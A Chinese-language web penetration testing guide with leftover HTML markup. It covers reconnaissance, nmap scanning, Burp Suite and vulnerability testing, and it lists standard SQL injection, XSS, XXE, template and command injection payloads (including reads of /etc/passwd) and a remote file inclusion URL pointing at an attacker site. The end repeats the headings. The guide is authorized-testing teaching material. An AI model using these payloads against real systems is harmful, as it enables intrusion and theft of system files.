Web渗透测试全面指南<\/h1>

0x00 前言<\/h2>
本指南详细介绍了Web应用程序渗透测试的完整流程和方法，涵盖从信息收集到漏洞利用的全过程。文档基于先知社区发布的《Web渗透测试笔记》整理而成，包含了大量实用的工具和技术。<\/p>

0x01 信息收集<\/h2>

1. 目标确认<\/h3>

工具推荐<\/strong>：<\/p>

Whois<\/code>：查询域名注册信息<\/li>
Dig<\/code>：DNS信息查询工具<\/li>
DNSRecon<\/code>：自动化DNS枚举脚本<\/li> <\/ul> 操作步骤<\/strong>：<\/p> 域名注册信息查询<\/strong>：<\/p> whois example.com <\/span><\/span>dig +short example.com <\/span><\/span>whois [<\/span>IP地址]<\/span> <\/span><\/span><\/code><\/pre><\/li> DNS信息查询<\/strong>：<\/p> 使用dnsdumpster.com在线工具<\/li> 正向查询： dig +nocmd example.com A +noall +answer <\/span><\/span>dig +nocmd example.com NS +noall +answer <\/span><\/span>dig +nocmd example.com MX +noall +answer <\/span><\/span><\/code><\/pre><\/li> 反向查询： dig -x 104.27.179.12 <\/span><\/span><\/code><\/pre><\/li> <\/ul> <\/li> 测试域传送漏洞<\/strong>：<\/p> dig -t AXFR zonetransfer.me @nsztm1.digi.ninja <\/span><\/span>dnsrecon -d example.com <\/span><\/span><\/code><\/pre><\/li> <\/ol> 2. OSINT公开情报收集<\/h3> 推荐工具<\/strong>：<\/p> Recon-NG：公开情报工具框架<\/li> Maltego：数据挖掘和关联分析工具<\/li> theHarvester：收集邮箱、子域名等信息<\/li> <\/ul> 资源推荐<\/strong>：<\/p> Michael Bazzell的OSINT资源：https:\/\/inteltechniques.com<\/li> Google Dorking技术：https:\/\/www.exploit-db.com\/google-hacking-database\/<\/li> <\/ul> 0x02 Mapping（应用映射）<\/h2> 1. 端口扫描与服务识别<\/h3> Nmap常用命令<\/strong>：<\/p> nmap 192.168.100.2 # 扫描前1000端口<\/span> <\/span><\/span>nmap -sP 192.168.100.0-7 # Ping扫描<\/span> <\/span><\/span>nmap -p 80,443 192.168.100.2 # 指定端口扫描<\/span> <\/span><\/span>sudo nmap -A 192.168.100.2 # 全面扫描(OS指纹+服务识别)<\/span> <\/span><\/span>sudo nmap -sU -p- 192.168.100.2 # 全UDP端口扫描<\/span> <\/span><\/span><\/code><\/pre>2. 浏览器代理设置<\/h3> Firefox推荐插件<\/strong>：<\/p> User Agent Switcher：快速切换用户代理<\/li> Wappalyzer：检测网站技术栈<\/li> FoxyProxy：代理切换插件<\/li> <\/ul> Burp Suite配置<\/strong>：<\/p> 设置Firefox代理：127.0.0.1:8080<\/li> 导入Burp的SSL证书<\/li> 配置Burp扫描速度为"thorough"<\/li> <\/ol> Burp扩展推荐<\/strong>：<\/p> Retire.js：检测过时的JavaScript组件<\/li> Wsdler：解析WSDL文件并测试方法<\/li> Python Scripter：执行自定义Python脚本<\/li> <\/ul> 3. 应用映射方法<\/h3> 人工浏览<\/strong>：<\/p> 访问每个页面，点击所有链接<\/li> 特别关注单页应用(SPA)的AJAX请求<\/li> <\/ul> <\/li> 自动化爬取<\/strong>：<\/p> 使用Burp Spider补充手工浏览<\/li> 建议手工浏览80-95%内容，仅少量使用爬虫<\/li> <\/ul> <\/li> 后续分析<\/strong>：<\/p> 记录Web服务器、技术栈、框架等信息<\/li> 特别关注关键功能点(如支付、密码重置等)<\/li> <\/ul> <\/li> <\/ol> 0x03 漏洞挖掘<\/h2> 1. 内容挖掘<\/h3> 工具推荐<\/strong>：<\/p> Nikto：Web服务漏洞扫描器 nikto -h http:\/\/example.com -output ~\/nikto.html -Format htm <\/span><\/span><\/code><\/pre><\/li> <\/ul> 2. 强制浏览技术<\/h3> 工具与方法<\/strong>：<\/p> 使用Burp的"Discover Content"工具<\/li> 使用Burp Intruder进行字典攻击<\/li> 利用FuzzDB提供的字典资源<\/li> <\/ol> 3. 测试可选内容<\/h3> 使用User Agent Switcher切换不同UA<\/li> 模糊测试User-Agent和Referer头<\/li> 使用FuzzDB字典进行测试<\/li> <\/ul> 4. 自动化漏洞扫描<\/h3> 先运行Burp Passive Scanner<\/li> 分析结果后运行Active Scanner<\/li> 注意扫描可能对生产环境造成影响<\/li> <\/ul> 5. 配置检查<\/h3> 默认配置检查<\/strong>：<\/p> 检查示例应用\/默认页面<\/li> 测试默认凭证<\/li> <\/ul> <\/li> 错误配置检查<\/strong>：<\/p> 关注错误信息泄露<\/li> 检查密码字段的自动填充问题<\/li> <\/ul> <\/li> <\/ol> 6. 身份认证测试<\/h3> 登录表单分析<\/strong>：<\/p> 检查是否有双重认证、验证码等<\/li> 测试SSL\/TLS配置<\/li> <\/ul> <\/li> 模糊登录测试<\/strong>：<\/p> 使用CeWL生成字典： cewl [<\/span>options]<\/span> www.example.com <\/span><\/span><\/code><\/pre><\/li> 使用Burp Intruder进行爆破(Cluster Bomb模式)<\/li> <\/ul> <\/li> <\/ol> 7. Session管理测试<\/h3> Session Token分析<\/strong>：<\/p> 使用Burp Sequencer测试随机性<\/li> 收集约10000个token进行分析<\/li> 检查Set-Cookie头的Secure和HttpOnly标志<\/li> <\/ul> <\/li> Session劫持测试<\/strong>：<\/p> 搜索Session token看是否可预测<\/li> <\/ul> <\/li> <\/ol> 8. 授权测试<\/h3> 权限控制测试<\/strong>：注册不同权限账户<\/li> 使用Burp的"Compare Site Maps"比较访问差异<\/li> <\/ul> <\/li> <\/ol> 9. 数据验证测试<\/h3> 注入类型与测试方法<\/strong>：<\/p> SQL注入<\/strong>：<\/p> ' OR 1=1 -- <\/span><\/span><\/span>admin'<\/span>;-- <\/span><\/span><\/span><\/span>http:\/\/<\/span>example.com\/<\/span>product.php?<\/span>id=<\/span>10<\/span> AND<\/span> 1<\/span>=<\/span>1<\/span> <\/span><\/span><\/code><\/pre>工具：SQLMap<\/p> <\/li> XSS测试<\/strong>：<\/p> <IMG<\/span> SRC<\/span>=<\/span>javascript:alert('XSS')<\/span>> <\/span><\/span>"><script<\/span>>alert<\/span>('XSS'<\/span>)<\/script<\/span>> <\/span><\/span><\/code><\/pre><\/li> XML注入<\/strong>：<\/p> Username = foo<!-- <\/span><\/span><\/span><\/code><\/pre><\/li> XXE注入<\/strong>：<\/p> <!ENTITY xxe SYSTEM "file:\/\/\/etc\/passwd"><\/span> <\/span><\/span><\/code><\/pre><\/li> 模板注入<\/strong>：<\/p> <%=<\/span> 7<\/span> *<\/span> 7<\/span> %><\/span> <\/span><\/span>{{ 7<\/span> *<\/span> 7<\/span> }} <\/span><\/span><\/code><\/pre><\/li> 命令注入<\/strong>：<\/p> ;cat \/etc\/passwd |dir c:\ <\/code><\/pre> <\/li> 文件包含<\/strong>：<\/p> LFI： preview.php?file=etc\/passwd <\/code><\/pre> <\/li> RFI： vuln_page.php?file=http:\/\/attacker_site\/malicous_page <\/code><\/pre> <\/li> <\/ul> <\/li> <\/ol> 10. 逻辑漏洞测试<\/h3> 测试非正常业务流程<\/li> 输入不切实际的值<\/li> 测试非法文件上传<\/li> <\/ul> 11. 加密算法测试<\/h3> 工具<\/strong>：<\/p> sslyze --regular www.example.com <\/span><\/span><\/code><\/pre>检查项<\/strong>：<\/p> 加密协议版本(TLS 1.2+)<\/li> 弱加密算法(MD5, RC4等)<\/li> 正向加密支持<\/li> <\/ul> 12. 拒绝服务测试<\/h3> 测试大文件上传<\/li> 测试账户锁定机制<\/li> 识别响应缓慢的接口<\/li> <\/ul> 13. Flash漏洞分析<\/h3> 工具<\/strong>：<\/p> JPEXS FFDec：SWF反汇编工具<\/li> Firefox开发者工具<\/li> <\/ul> 方法<\/strong>：<\/p> 下载Flash文件<\/li> 反编译分析源代码<\/li> 寻找隐藏漏洞<\/li> <\/ol> 0x04 Web服务测试<\/h2> 1. REST服务测试<\/h3> 方法<\/strong>：<\/p> 阅读API文档(如有)<\/li> 拦截分析JSON请求\/响应<\/li> 测试常见漏洞(SQLi\/XSS等)<\/li> <\/ol> 参考资源<\/strong>：<\/p> OWASP REST评估备忘单<\/li> <\/ul> 2. SOAP服务测试<\/h3> 工具<\/strong>：<\/p> Wsdler(Burp扩展)<\/li> <\/ul> 步骤<\/strong>：<\/p> 查找WSDL文件(如\/service)<\/li> 使用Wsdler解析WSDL<\/li> 发送测试请求分析响应<\/li> <\/ol> 0x05 漏洞利用<\/h2> 1. XSS利用<\/h3> 工具<\/strong>：<\/p> BeEF：XSS利用框架<\/li> <\/ul> 方法<\/strong>：<\/p> 构造XSS payload<\/li> 使用BeEF控制受害者浏览器<\/li> <\/ol> 2. SQL注入利用<\/h3> 工具<\/strong>：<\/p> SQLMap：自动化SQL注入工具<\/li> <\/ul> 利用场景<\/strong>：<\/p> 数据提取<\/li> 离线密码爆破(使用Hashcat)<\/li> 认证绕过： admin<\/span>' -- <\/span><\/span><\/span>admin'<\/span> or<\/span> '1'<\/span>=<\/span>'1 <\/span><\/span><\/span><\/code><\/pre><\/li> <\/ol> 3. CSRF利用<\/h3> Burp功能<\/strong>：<\/p> Generate CSRF PoC<\/li> <\/ul> 步骤<\/strong>：<\/p> 拦截目标请求<\/li> 生成CSRF PoC<\/li> 验证漏洞有效性<\/li> <\/ol> 0x06 总结<\/h2> 本指南涵盖了Web渗透测试的全流程，从信息收集到漏洞利用。关键点包括：<\/p> 全面的信息收集是成功渗透的基础<\/li> 细致的应用映射能发现隐藏功能<\/li> 多种漏洞测试方法需结合使用<\/li> 自动化工具与手工测试相辅相成<\/li> 漏洞利用要考虑实际影响<\/li> <\/ol> 记住渗透测试是迭代过程，发现新信息后可能需要重新评估之前的步骤。始终确保获得授权后再进行测试。<\/p>

Web渗透测试全面指南<\/h1>

0x00 前言<\/h2> 本指南详细介绍了Web应用程序渗透测试的完整流程和方法，涵盖从信息收集到漏洞利用的全过程。文档基于先知社区发布的《Web渗透测试笔记》整理而成，包含了大量实用的工具和技术。<\/p>

0x01 信息收集<\/h2>

0x02 Mapping（应用映射）<\/h2>

0x03 漏洞挖掘<\/h2>

0x04 Web服务测试<\/h2>

0x05 漏洞利用<\/h2>

0x00 前言<\/h2>
本指南详细介绍了Web应用程序渗透测试的完整流程和方法，涵盖从信息收集到漏洞利用的全过程。文档基于先知社区发布的《Web渗透测试笔记》整理而成，包含了大量实用的工具和技术。<\/p>